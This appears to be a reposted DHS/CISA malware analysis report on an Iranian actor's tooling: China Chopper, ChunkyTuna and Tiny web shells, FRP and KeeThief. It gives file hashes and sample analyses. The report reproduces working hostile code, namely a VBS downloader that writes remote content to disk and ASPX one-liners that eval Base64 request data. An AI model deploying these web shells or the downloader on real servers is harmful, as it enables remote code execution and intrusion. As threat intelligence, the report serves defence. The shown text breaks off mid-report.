Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

The Iranian-based malicious cyber actor associated to this report is known to target industries associated to information technology, government, healthcare, financial, and insurance across the US. The threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. Once the actor exploits these vulnerabilities, open source web shells and/or modified versions of the web shells are used to further entrench into a victim network. The web shells are publicly known as ChunkyTuna, Tiny, and China Chopper web shells.

This product details the functionality of 19 malicious files including multiple components of the China Chopper web shell, including an application service provider (ASP) application that listens for incoming Hypertext Transfer Protocol (HTTP) connections from a remote operator. The China Chopper web shell will allow the operator to pass and execute JavaScript code on to a victim’s system. The report also details additional China Chopper web shell components that allow the operator more specific command and control (C2) capabilities including the ability to enumerate directories, upload and execute additional payloads, and exfiltrate data.

In addition, a program data (PDB) file and a binary, which has been identified as a compiled version of the open source project known as “FRP”, was also analyzed. FRP allows an adversary to tunnel various types of connections to a remote operator sitting outside of the victim’s network perimeter. In addition, a PowerShell shell script was analyzed that is part of the open source project known as “KeeThief”. This code will allow the operator to access encrypted password credentials stored by the Microsoft “KeePass” password management software.

It appears this adversary utilized these malicious tools to maintain persistent remote access and data exfiltration from the victim’s network. The adversary may have used the “FRP” utility to tunnel outbound Remote Desktop Protocol (RDP) sessions, allowing persistent access to the network from outside the firewall perimeter. The China Chopper web shell also provides the persistent ability to navigate throughout the victim’s network when inside the perimeter. Leveraging the “KeeThief” utility allows access to sensitive user password credentials and potentially the ability to pivot to user accounts outside of the victim’s network.

An additional 7 files contain malicious Hypertext Preprocessor (PHP) code designed to function as malicious web shells, which were identified as ChunkyTuna and Tiny web shells. The purpose of these web shells is to accept commands and data from a remote operator, providing the operator C2 capabilities over a compromised system.

For a downloadable copy of IOCs, see MAR-10297887-1.v1.stix.

Submitted Files (18)

134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13 (site.aspx)

17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c (vti_cnf.aspx.33154034.compiled)

28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea (App_Web_tcnma5bs.pdb)

2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849 (prev_sh)

3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c (content)

40d54609acb3f1024ea91b79ca12ecf855e24ebb46d48db86a7bf34edb91b2db (httpgetbin_encoded.vbs)

4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756 (content)

51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21 (df5bd34799e200951fcce77c1c0b42…)

547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c (df5bd34799e200951fcce77c1c0b42…)

553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f (ui-bg.aspx)

55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c (svchost.exe)

5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a (App_Web_tcnma5bs.0.js)

8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3 (content)

913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0 (kee.ps1)

99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc (App_Web_tcnma5bs.dll)

b36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a (tiny_webshell)

b443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249 (df5bd34799e200951fcce77c1c0b42…)

f7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde (dllhost.dll)

Additional Files (1)

10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334 (KeeTheft.dll)

Findings

40d54609acb3f1024ea91b79ca12ecf855e24ebb46d48db86a7bf34edb91b2db

Details
Name httpgetbin_encoded.vbs
Size 415 bytes
Type ASCII text, with CRLF line terminators
MD5 876f28cbcd4711f0a95b44708d56ce70
SHA1 108bc87632304769aac05609434563448b403e2d
SHA256 40d54609acb3f1024ea91b79ca12ecf855e24ebb46d48db86a7bf34edb91b2db
SHA512 2a6ecf1a5bd8c6d396edd48ff2da32e9beaa578289c8ea3578a6d0b0c6a2c31ca945d156ad0a95a37b56405c6493c3dff8f14ff505fd662b1f98372c0d05b100
ssdeep 12:KwAJFfyTpHkCGHjBHTeSCqFaKLVe4BURBL1LvxTVTpcqPv:KwAHfAmPDZTeSCqFaKLpubLv1hpcqPv
Entropy 5.087384
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a small JavaScript file, which contains the following code:

—Begin JavaScript Code—
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
set oHTTP = CreateObject(“Msxml2.ServerXMLHTTP”)
oHTTP.open “GET”, WScript.Arguments.Item(1) ,false
oHTTP.setOption 2, 13056
oHTTP.send
Set objFile = objFSO.OpenTextFile(WScript.Arguments.Item(0), 2, True)
For x = 1 To Len(oHTTP.responseText) Step 2
objFile.Write Chr(Clng(“&H” & Mid(oHTTP.responseText,x,2)))
Next
objFile.Close
—End JavaScript Code—

Analysis indicates this file is part of a larger application, which contains the ability to communicate with a remote server. An HTTP request will be sent and received from the remote server. The data received from the server will be written to a file on disk. The output file name and remote server name will be received as arguments to the script. It is believed this script is a component of the China Chopper web shell framework.

553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f

Tags

trojanwebshell

Details
Name ui-bg.aspx
Size 178 bytes
Type ASCII text, with no line terminators
MD5 d7b7a8c120b69166643ee05bf70b37e5
SHA1 2ac99374cab70f8be83c48bbf3258eae78676f65
SHA256 553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f
SHA512 8c51c9e3d3d39ec7b961482ed7fc8cde1804ef126b72fce270c6891f64f4371067a65a8be1cbab1ab3c8860a3e2ea206d274f064d54cf2605ffd7eac51fa0515
ssdeep 3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtGnKRHBIwLWEDp:aEm7EnLgyKBM5Y/tZ6KCHKF2xKt5e/GY
Entropy 5.196436
Antivirus
ESET ASP/Webshell.T trojan
Sophos Troj/WebShel-F
Symantec Hacktool.Jsprat
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a small JavaScript file, which contains the following code:

—Begin JavaScript Code—
@ Page Language=”Jscript”%><%try
{
eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[“[Redacted]”])),”unsafe”);
}
catch(e)
{
}
—End JavaScript Code—

Analysis indicates this file might serve as part of a larger application. The code within the file decodes and executes data using the JavaScript “eval” function. The data is attained via the JavaScript “Request” function indicating the data is pulled from a remote server using the HTTP protocol. It is believed this script is a component of the China Chopper web shell framework.

134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13

Tags

trojanwebshell

Details
Name site.aspx
Size 178 bytes
Type ASCII text, with no line terminators
MD5 20d89fa1df155632fafb2c9fe1a6a038
SHA1 c9cf494475de81dae5a2c54c678b4a518f46b1fe
SHA256 134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13
SHA512 c1d485e34153c50af79e719c4100b988ba4d289578d385d0b30d2225c20b4b8f715d215f609a141030489a337ff36a89b23d4e99bf1895466122fde97e1214f0
ssdeep 3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtJIIDYbwLWEDvR:aEm7EnLgyKBM5Y/tZ6KCHKF2xKt5e/f3
Entropy 5.201321
Antivirus
ESET ASP/Webshell.T trojan
Sophos Troj/WebShel-F
Symantec Hacktool.Jsprat
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a small JavaScript file, which contains the following embedded code:

—Begin Embedded JavaScript—
Page Language=”Jscript”%><%try
{
eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[“ammashnist”])),”unsafe”);
}
catch(e)
{
}
—End Embedded JavaScript—

This script is designed to pull JavaScript from an existing “Request Object”, Base64 decode and execute it. The contents of the retrieved JavaScript code were not available for analysis. It is believed this web shell is a component of the China Chopper web shell framework.

17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c

Details
Name vti_cnf.aspx.33154034.compiled
Size 408 bytes
Type XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5 de1cd1c54711544508d157214323af85
SHA1 c33a07965e06280c53e19a5d093983205433843f
SHA256 17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c
SHA512 8265901a684f808c612f9cfcc486aaba923e2cf8ca7fdcd3071e786ad6030c067c4147b7b4e36bb271a5f2b36e0c3f487ceb259e2f00e6afd907ecb6df111a7a
ssdeep 12:MMHdWFV2q6sX1rMxA0UH17I2fUQ/1OifV2q6sW6/1:JdmsvkrGOnfUcBsve/1
Entropy 5.120655
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

[…]


By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to “allow cookies” to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click “Accept” below then you are consenting to this.

Close





Source link

Write a comment:
*

Your email address will not be published.